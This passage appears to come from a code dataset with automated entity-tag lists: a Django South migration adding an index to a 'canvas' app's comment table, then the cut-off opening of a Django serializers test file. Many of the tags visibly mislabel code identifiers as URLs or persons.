'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'collections.Mu'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.se'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.fr'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.co'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.re'], ['URL', 'self.to'], ['URL', 'attr.re'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.se'], ['URL', 'token.in'], ['URL', 'list.in'], ['URL', 'list.in'], ['URL', 'list.in'], ['URL', 'list.co'], ['URL', 'list.re'], ['URL', 'list.re'], ['URL', 'copy.co'], ['URL', 'copy.co'], ['URL', 'copy.co'], ['URL', 'numbers.Int'], ['URL', 'copy.co'], ['URL', 'numbers.Int'], ['URL', 'snippet.re'], ['URL', 'inspect.st'], ['URL', 'self.st'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'joiner.jo'], ['URL', 'string.fo'], ['URL', 'os.path.re'], ['URL', 'self.st']]" +41,"# -*- coding: utf-8 -*- +import datetime +from south.db import db +from south.v2 import SchemaMigration +from django.db import models + + +class Migration(SchemaMigration): + + def forwards(self, orm): + db.execute(""create index canvas_comment_id_and_visibility_and_parent_comment_id on canvas_comment (id, visibility, parent_comment_id);"") + + def backwards(self, orm): + raise RuntimeError(""Cannot reverse this migration."") + + models = { + 'auth.group': { + 'Meta': {'object_name': 'Group'}, + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), + 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': ""orm['auth.Permission']"", 'symmetrical': 'False', 'blank': 'True'}) + }, + 'auth.permission': { + 'Meta': {'ordering': ""('content_type__app_label', 'content_type__model', 'codename')"", 'unique_together': ""(('content_type', 'codename'),)"", 'object_name': 'Permission'}, + 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), + 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['contenttypes.ContentType']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) + }, + 'auth.user': { + 'Meta': {'object_name': 'User'}, + 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), + 'email': ('django.db.models.fields.EmailField', [], {'max_length': '254', 'blank': 'True'}), + 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), + 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': ""orm['auth.Group']"", 'symmetrical': 'False', 'blank': 'True'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), + 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), + 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), + 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), + 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': ""orm['auth.Permission']"", 'symmetrical': 'False', 'blank': 'True'}), + 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) + }, + 'canvas.apiapp': { + 'Meta': {'object_name': 'APIApp'}, + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}) + }, + 'canvas.apiauthtoken': { + 'Meta': {'unique_together': ""(('user', 'app'),)"", 'object_name': 'APIAuthToken'}, + 'app': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.APIApp']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'token': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}) + }, + 'canvas.bestof': { + 'Meta': {'object_name': 'BestOf'}, + 'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'best_of'"", 'null': 'True', 'blank': 'True', 'to': ""orm['canvas.Category']""}), + 'chosen_by': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}), + 'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'best_of'"", 'to': ""orm['canvas.Comment']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {}) + }, + 'canvas.category': { + 'Meta': {'object_name': 'Category'}, + 'description': ('django.db.models.fields.CharField', [], {'max_length': '140'}), + 'founded': ('django.db.models.fields.FloatField', [], {'default': '1298956320'}), + 'founder': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'founded_groups'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'moderators': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': ""'moderated_categories'"", 'symmetrical': 'False', 'to': ""orm['auth.User']""}), + 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}), + 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) + }, + 'canvas.comment': { + 'Meta': {'object_name': 'Comment'}, + 'anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'author': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'comments'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}), + 'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'comments'"", 'null': 'True', 'blank': 'True', 'to': ""orm['canvas.Category']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'ip': ('django.db.models.fields.IPAddressField', [], {'default': ""'127.0.0.1'"", 'max_length': '15'}), + 'judged': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'ot_hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'replies'"", 'null': 'True', 'blank': 'True', 'to': ""orm['canvas.Comment']""}), + 'parent_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': ""'comments'"", 'null': 'True', 'to': ""orm['canvas.Content']""}), + 'posted_on_quest_of_the_day': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'replied_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': ""orm['canvas.Comment']"", 'null': 'True', 'blank': 'True'}), + 'reply_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': ""'used_in_comments'"", 'null': 'True', 'to': ""orm['canvas.Content']""}), + 'reply_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}), + 'score': ('django.db.models.fields.FloatField', [], {'default': '0', 'db_index': 'True'}), + 'skip_moderation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'star_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}), + 'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'blank': 'True'}), + 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) + }, + 'canvas.commentflag': { + 'Meta': {'object_name': 'CommentFlag'}, + 'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'flags'"", 'to': ""orm['canvas.Comment']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {}), + 'type_id': ('django.db.models.fields.IntegerField', [], {}), + 'undone': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'flags'"", 'to': ""orm['auth.User']""}) + }, + 'canvas.commentmoderationlog': { + 'Meta': {'object_name': 'CommentModerationLog'}, + 'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']"", 'null': 'True'}), + 'note': ('django.db.models.fields.TextField', [], {}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'moderated_comments_log'"", 'to': ""orm['auth.User']""}), + 'visibility': ('django.db.models.fields.IntegerField', [], {}) + }, + 'canvas.commentpin': { + 'Meta': {'object_name': 'CommentPin'}, + 'auto': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}) + }, + 'canvas.commentsticker': { + 'Meta': {'object_name': 'CommentSticker'}, + 'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'stickers'"", 'to': ""orm['canvas.Comment']""}), + 'epic_message': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '140', 'blank': 'True'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {}), + 'type_id': ('django.db.models.fields.IntegerField', [], {}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': ""orm['auth.User']"", 'null': 'True', 'blank': 'True'}) + }, + 'canvas.commentstickerlog': { + 'Meta': {'object_name': 'CommentStickerLog'}, + 'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}) + }, + 'canvas.content': { + 'Meta': {'object_name': 'Content'}, + 'alpha': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'animated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'id': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}), + 'ip': ('django.db.models.fields.IPAddressField', [], {'default': ""'127.0.0.1'"", 'max_length': '15'}), + 'remix_of': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': ""'remixes'"", 'null': 'True', 'to': ""orm['canvas.Content']""}), + 'remix_text': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '1000', 'blank': 'True'}), + 'source_url': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '4000', 'blank': 'True'}), + 'stamps_used': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': ""'used_as_stamp'"", 'blank': 'True', 'to': ""orm['canvas.Content']""}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {}), + 'url_mapping': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.ContentUrlMapping']"", 'null': 'True', 'blank': 'True'}), + 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) + }, + 'canvas.contenturlmapping': { + 'Meta': {'object_name': 'ContentUrlMapping'}, + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) + }, + 'canvas.emailunsubscribe': { + 'Meta': {'object_name': 'EmailUnsubscribe'}, + 'email': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) + }, + 'canvas.externalcontent': { + 'Meta': {'object_name': 'ExternalContent'}, + '_data': ('django.db.models.fields.TextField', [], {'default': ""'{}'""}), + 'content_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'external_content'"", 'to': ""orm['canvas.Comment']""}), + 'source_url': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '4000', 'null': 'True', 'blank': 'True'}) + }, + 'canvas.facebookinvite': { + 'Meta': {'object_name': 'FacebookInvite'}, + 'fb_message_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'invited_fbid': ('django.db.models.fields.CharField', [], {'max_length': '255'}), + 'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'facebook_invited_from'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}), + 'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'facebook_sent_invites'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}) + }, + 'canvas.facebookuser': { + 'Meta': {'object_name': 'FacebookUser'}, + 'email': ('django.db.models.fields.CharField', [], {'max_length': '255'}), + 'fb_uid': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}), + 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), + 'gender': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'last_invited': ('canvas.util.UnixTimestampField', [], {'default': '0'}), + 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), + 'user': ('django.db.models.fields.related.OneToOneField', [], {'to': ""orm['auth.User']"", 'unique': 'True', 'null': 'True', 'blank': 'True'}) + }, + 'canvas.followcategory': { + 'Meta': {'unique_together': ""(('user', 'category'),)"", 'object_name': 'FollowCategory'}, + 'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'followers'"", 'to': ""orm['canvas.Category']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'following'"", 'to': ""orm['auth.User']""}) + }, + 'canvas.invitecode': { + 'Meta': {'object_name': 'InviteCode'}, + 'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'invited_from'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}), + 'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'sent_invites'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}) + }, + 'canvas.remixplugin': { + 'Meta': {'object_name': 'RemixPlugin'}, + 'author': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 's3md5': ('django.db.models.fields.CharField', [], {'max_length': '255'}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}) + }, + 'canvas.stashcontent': { + 'Meta': {'object_name': 'StashContent'}, + 'content': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Content']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}) + }, + 'canvas.userinfo': { + 'Meta': {'object_name': 'UserInfo'}, + 'avatar': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Content']"", 'null': 'True'}), + 'bio_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}), + 'enable_timeline': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), + 'enable_timeline_posts': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'facebook_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}), + 'follower_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}), + 'free_invites': ('django.db.models.fields.IntegerField', [], {'default': '10'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'invite_bypass': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '255', 'blank': 'True'}), + 'is_qa': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'post_anonymously': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'profile_image': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']"", 'null': 'True'}), + 'trust_changed': ('canvas.util.UnixTimestampField', [], {'null': 'True', 'blank': 'True'}), + 'trusted': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}), + 'user': ('django.db.models.fields.related.OneToOneField', [], {'to': ""orm['auth.User']"", 'unique': 'True'}) + }, + 'canvas.usermoderationlog': { + 'Meta': {'object_name': 'UserModerationLog'}, + 'action': ('django.db.models.fields.IntegerField', [], {}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']"", 'null': 'True'}), + 'note': ('django.db.models.fields.TextField', [], {}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'moderation_log'"", 'to': ""orm['auth.User']""}) + }, + 'canvas.userwarning': { + 'Meta': {'object_name': 'UserWarning'}, + 'comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': ""orm['canvas.Comment']"", 'null': 'True', 'blank': 'True'}), + 'confirmed': ('canvas.util.UnixTimestampField', [], {'default': '0'}), + 'custom_message': ('django.db.models.fields.TextField', [], {}), + 'disable_user': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'issued': ('canvas.util.UnixTimestampField', [], {}), + 'stock_message': ('django.db.models.fields.IntegerField', [], {'default': '0'}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'user_warnings'"", 'to': ""orm['auth.User']""}), + 'viewed': ('canvas.util.UnixTimestampField', [], {'default': '0'}) + }, + 'canvas.welcomeemailrecipient': { + 'Meta': {'object_name': 'WelcomeEmailRecipient'}, + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'recipient': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']"", 'unique': 'True'}) + }, + 'contenttypes.contenttype': { + 'Meta': {'ordering': ""('name',)"", 'unique_together': ""(('app_label', 'model'),)"", 'object_name': 'ContentType', 'db_table': ""'django_content_type'""}, + 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), + 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) + } + } + + complete_apps = ['canvas'] +",21701,"[['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['PERSON', 'FloatField'], ['DATE_TIME', ""'2000'""], ['PERSON', 'FloatField'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'canvas.co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['PERSON', 'RemixPlugin'], ['DATE_TIME', ""'2000'""], ['PERSON', 'follower_count'], ['PERSON', 'UserWarning'], ['PERSON', 'complete_apps'], ['URL', 'auth.gr'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Pe'], ['URL', 'auth.pe'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'contenttypes.Co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'auth.us'], ['URL', 'django.db.models.fi'], ['URL', 'datetime.datetime.no'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Gr'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fi'], ['URL', 'datetime.datetime.no'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Pe'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.be'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'canvas.ca'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.co'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Bi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.re'], ['URL', 'auth.Us'], ['URL', 'canvas.fo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.in'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.re'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'canvas.st'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Nu'], ['URL', 'django.db.models.fields.re'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'contenttypes.co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Ch']]" +42,""""""" +A test spanning all the capabilities of all the serializers. + +This class defines sample data and a dynamically generated +test case that is capable of testing the capabilities of +the serializers. This includes all valid data values, plus +forward, backwards and self references. +"""""" +from __future__ import unicode_literals + +import datetime +import decimal +from unittest import expectedFailure, skipUnless + +try: + import yaml +except ImportError: + yaml = None + +from django.core import serializers +from django.core.serializers import SerializerDoesNotExist +from django.core.serializers.base import DeserializationError +from django.core.serializers.xml_serializer import DTDForbidden +from django.db import connection, models +from django.http import HttpResponse +from django.test import TestCase +from django.utils import six +from django.utils.encoding import force_text +from django.utils.functional import curry + +from .models import (BinaryData, BooleanData, CharData, DateData, DateTimeData, EmailData, + FileData, FilePathData, DecimalData, FloatData, IntegerData, IPAddressData, + GenericIPAddressData, 